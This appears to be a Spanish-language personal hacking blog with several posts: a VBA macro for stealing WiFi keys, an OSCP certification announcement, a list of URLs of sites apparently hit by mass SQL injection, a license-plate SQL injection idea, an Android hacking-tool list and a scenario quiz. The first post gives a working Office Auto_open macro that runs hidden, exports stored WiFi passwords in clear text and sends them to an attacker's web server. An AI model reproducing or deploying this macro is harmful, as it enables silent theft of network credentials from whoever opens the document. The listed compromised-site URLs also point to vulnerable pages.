Te gusta la tecnología?, la seguridad?, el hacking?... a mi tambien, acá comparto mis experiencias.
sábado, 23 de febrero de 2013
Como obtener clave de WiFI (WEP - WPA2) a traves de macros
Muchos ya conoceran las herramientas de Nirsoft para la recuperacion de passwords, la idea con esta prueba es la misma, obtener la clave almacenada en el registro para luego ser enviada a un determinado sitio (bajo ciertas condiciones).
Para ello existe un comando muy util que nos permitira obtener las claves desde el registro:
netsh wlan export profile folder=. key=clear
Podemos cargar dicha clave en una macro de office para su ejecucion, enviando el resultado a un servidor web bajo nuestro poder:
Sub Auto_open()
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("mw.bat", True)
a.writeline "@echo off"
a.writeline "@netsh wlan export profile folder=. key=clear"
a.writeline "@for /f ""delims="" %%i in ('find ""keyMaterial"" *.xml') do set contenido=""%%i"""
a.writeline "@start http://200.XXX.XXX.XXX/?%contenido%"
Call Shell(Environ$("COMSPEC") & " /c mw.bat", vbHide)
End Sub
Cuando el objetivo ejecute el macro, enviara automaticamente los datos obtenidos hacia el sitio web, en los cuales se encontrará la clave en texto claro, si esta no tiene el parámetro "protected=true" en la configuracion del XML, para mayor informacion acerca de este ultimo punto vean este sitio.
Saludos
Boris
domingo, 17 de febrero de 2013
Obtuve el OSCP (Offensive Security Certified Professional)
Offensive Security es la empresa que se encuentra detras de la distribucion Backtrack (pronto Kali?), la cual se concentra justamente en el uso de esta distribucion, conjuntamente con la metodologia y herramientas necesarias para realizar un penetration test, se diferencia de otras certificaciones de hacking en que el curso se lleva a cabo con acceso remoto a un laboratorio que simula distintos entornos y vulnerabilidades y la certificacion se la gana con un examen en otro entorno de laboratorio, donde se debe acceder (hackear) a un conjunto de equipos para obtener la calificacion necesaria para certificarse, lo cual la hace una certificacion muy respetada en el entorno de profesionales de seguridad especializados en Ethical Hacking.
Realmente es un curso muy recomendable en cuanto a material y en general al espiritu del curso que se centra en lo que realiza un pen tester: la investigacion bajo el lema de "Try Harder", este curso me permitio mejorar las habilidades relacionadas con el hacking, de tal modo que la semana pasada tomé el examen de certificacion (24 horas de examen + 24 horas para la entrega de un informe), y 3 dias despues recibí la noticia: obtuve la certificacion OSCP.
Para mayor informacion al respecto pueden visitar el sitio de Offensive Security.
Boris
miércoles, 25 de enero de 2012
Ataque de SQL Injection masivo
Investigadores en seguridad de Internet Storm Center, lanzaron un ataque de SQL Injection masivo a varios sitos de internet en una operación denominada Lilupophilupop , a la fecha más de un millón de sitios fueron comprometidos, lo que hacen es redireccionar la página con el recurso afectado a un sitio que podría servir firmas falsas de antivirus y aplicaciones falsas como Adobe Flash.
Más allá del total desacuerdo en cuanto a la modificación de contenido en los sitios investigados, es motivo de interés los resultados logrados por dicho ataque, entre los cuales a nivel Latinoamérica se encuentran:
Bolivia
http://www.congreso.gob.bo/5biblioteca/dyna/print_biblio.asp?fot=1%20&id=7933
Perú
http://www.camusso.com.pe/camusso/product.asp?dept_id=81&pf_id=0750903
Argentina
http://www.borello.com.ar/plantilla_embarcacion.asp?id=1296
www.fotointernacional.com.ar/esp/masinfo.asp?id=829
electroindustria.com.ar/nuevo/aplicacion.asp?inf_id=6889
www.athospatagonia.com.ar/Consulta_producto.asp?dato=61
…
Aparentemente se tratan de ataques combinados entre herramientas automáticas y manuales.
Saludos cordiales
Nelson Boris Murillo Prieto
martes, 27 de diciembre de 2011
Como Hackear una cámara de control de Placas
Hola, escribiendo después de tiempo, estoy ocupadísimo con el trabajo así que espero organizarme mejor este 2012 para no dejar huerfano al blog.
En este post una idea muy interesante para hackear un sistema de lectura de placas la idea se explica en las siguientes imágenes:
Como la cámara lee el contenido de la placa y luego es enviada al reconocedor de caracteres y posiblemente almacenada en una base de datos, existe una posibilidad de realizar un SQL Injection (Se lee el ‘DROP DATABASE’?,
).
Saludos y un venturoso 2012!!!
martes, 15 de noviembre de 2011
sábado, 29 de octubre de 2011
Kit de herramientas de seguridad y hacking para Android
Imágen de Android Guerrero por Irskaad
Esta no es una lista cerrada (la iremos ampliando), vamos a mostrar algunas aplicaciones gratuitas que convierten tu Android en un auténtico road warrior para la auditar la seguridad de todo tipo de redes y sistemas.
Lo primero ya sabes, es necesario que tengas tu Android rooteado, la mayoría de estas aplicaciones lo requieren. Android es prácticamente un Linux, y por lo tanto estas aplicaciones de bajo nivel requieren acceso root a la mayoría de las funciones del sistema.
Vamos con esta auténtica navaja suiza de la seguridad Android:
Router Passwords: más que una aplicación, es una base de datos con toda la información (login y passwords por defecto) de multitud de routers de todas las marcas.
Router Brute Force: si no quieres molestarte mirando el diccionario en la aplicación anterior, puedes intentar averiguarla (por fuerza bruta, usando diccionarios) a través de este programa. Si ya tienes acceso a una red, esta herramienta es perfecta para intentar acceder al router.
Terminal Emulator: necesario, tener siempre a mano una ventana de línea de comandos (shell de Linux) por lo que pueda pasar
Wireless Tether: si necesitas conectar el ordenador a Internet, esta es la aplicación perfecta para hacerlo desde el móvil. Crea un WiFi desde la cual puedes conectar cualquier ordenador y tener acceso a la web.
NetWork Discovery: creo que es la aplicación que más información te ofrece sobre una red. Es capaz de escanear una red y mostrar un listado de todos los dispositivos conectados a la misma con sus respectivas direcciones IP y MAC. Pero no sólo eso, además te lo identifica, si es un router, un PC, una impresora, etc.
PulWifi: muestra las contraseñas por defecto de algunos puntos de acceso WiFi. Soporta las de WLAN_XXXXX, JAZZTEL_XXXXX, YACOMXXXXX, WIFIXXXX, algunos modelos de D-Link y de Huawei. Perfecto para analizar el nivel de seguridad de tu WiFi.
Shark: sniffer de red que funciona en 3G y Wifi. Es un port del famoso tcpdump. Te permite examinar los paquetes TCP/IP que pasan por tu sistema.
ConnectBot: cliente Telnet/SSH de código abierto, permite también hacer SSH tunneling (técnica utilizada para evitar cortafuegos ó proteger tu información).
WifiAnalyzer: otra herramienta más para analizar a fondo una WiFi. Muestra los canales, MAC, tipo de encriptación y la potencia de la señal. Ideal para encontrar el canal perfecto para ajustar nuestro hardware.
ElectroDroid: cuando tienes que pasar a la acción a nivel hardware, esta aplicación puede que te venga bien. Es una biblioteca de referencia sobre Electrónica, que incluye código de color de resistencias, calculadora de varias fórmulas electrónicas, patillaje de todos los puertos de un ordenador y de aparatos de video, tablas de todo tipo, etc. Indispensable.
WLANAudit: aplicación para encontrar redes WiFi y comprobar su seguridad. Con algunos puntos es capaz de calcular la contraseña por defecto del cifrado empleado.
WiFi File Explorer: permite compartir ficheros desde tu dispositivo móvil. En otras palabras, convierte tu móvil en un servidor de ficheros dentro de la red.
Bluetooth File Transfer: busca, explora y gestiona ficheros en cualquier dispositivo Bluetooth usando FTP y OPP. No sólo vivimos de WiFi’s
Hackers Dictionary: por si olvidas algún término, aquí tienes el famoso Jargon File.
Working with BackTrack: desde la instalación de BackTrack hasta todo tipo de información sobre esta distribución Linux de seguridad. Incluye vídeos y documentos de todo tipo, altamente recomendable.
Droidsheep: si ya conoces Firesheep ya sabes de que va esta herramienta. Como la definen en su web “Secuestro de sesiones en un sólo click” o como diría yo (tuxotron) “Secuestro de sesiones a golpe de ratón dedo” .
Faceniff: permite capturar sesiones web sobre wifi. Funciona sobre redes Abierta/WEP/WPA-PSK/WPA2-PSK. Es parecida a Droidsheep.
Router Keygen: al igual que PullWifi, detecta y genera las claves de encriptación (WEP y WPA) por defecto de: Routers basados enThomson (Thomson, SpeedTouch, Orange, Infinitum, BBox, DMax, BigPond, O2Wireless, Otenet, Cyta , TN_private ), DLink (sólo algunos modelos), Pirelli Discus, Eircom, Verizon FiOS (sólo algunos modelos), Alice AGPF, FASTWEB Pirelli and Telsey, Huawei (algunos Infinitum), Wlan_XXXX or Jazztel_XXXX (Comtrend y Zyxel), Wlan_XX (algunos modelos), Ono ( P1XXXXXX0000X ), WlanXXXXXX, YacomXXXXXX y WifiXXXXXX (también conocido como wlan4xx ), Sky V1, Clubinternet.box v1 y v2 (TECOM), InfostradaWifi
Fing – Network Tools: herramienta que nos provee funcionalidades para sacar todo tipo de información de un red: network discovery, escaneo de servicios, ping, traceroute, DNS lookup, etc. Muy completa.
Shark Reader: lector de ficheros pcap. Por lo visto tiene problemas con ficheros grandes, pero nos podría resultar muy útil para echar un vistazo rápido después de haber capturado tráfico de red.
Arpspoof: una utilidad casi indispensable para capturar tráfico de red que no vaya dirigido a nosotros usando lo que se conoce como arp spoofing. Digo casi indispensable, porque que podemos conseguir lo mismo con tcpdump.
tcpdump: este no lo teníamos en la lista y que puede decir de éste. Tcpdump es la herramienta de facto de cualquier máquina *nix, para analizar el tráfico de red y por consiguiente capturarlo. Esta versión para Android no tiene la potencia que la de un sistema *nix, pero nos ofrece las funcionalidades básicas, entre ellas la captura de paquetes.
Anti: Android Network Toolkit es un conjunto de utilidades que nos permite explotar servicios en una red local. Es una especie de mini metasploit para Android. El problema es que tiene varias versiones y con lo que te ofrece la gratuita lo puedes hacer con el resto de herramientas aquí listadas, pero se eres un profesional de la seguridad informática, ésta seria una gran adición a tu caja de herramientas.
Routerpwn: colección de vulnerabilidades para los rourters más conocidos y dispositivos embebidos.
Bueno esta lista supongo que se puede ampliar, esperamos vuestras aportaciones.
Por supuesto, CyberHades no se hace responsable del mal uso de todas estas aplicaciones, vamos que ya somos mayorcitos
Fuente: http://www.cyberhades.com/2011/10/20/kit-de-herramientas-de-seguridad-y-hacking-para-android/
jueves, 6 de octubre de 2011
Security Jack all Trades–Cartero
Continuando con el post anterior, a continuación las instrucciones:
Este es un test que se trabaja bajo escenarios, cada escenario es familiar por lo que no necesitas conocimientos técnicos, cada escenario tiene cuatro preguntas, las respuestas deben ser breves (las pueden publicar acá), las respuestas de “ciencia ficción” no son válidas, si lo toman por su cuenta, cada una debería tomarles 10 minutos. Podemos discutir las respuestas (de hecho esa es la idea).
Escenario Uno – Cartero
Eres un cartero de un servicio de correo postal independiente. Tienes que entregar un paquete del tamaño de un libro.
1. Enumere 10 maneras de identificar al RECEPTOR del mensaje.
2. Liste 10 cosas que te impedirían de entregar el paquete.
3. Liste 10 razones para no entregar el paquete.
4. Enumere 10 maneras de identificar al REMITENTE del mensaje.
Espero sus respuestas!!!

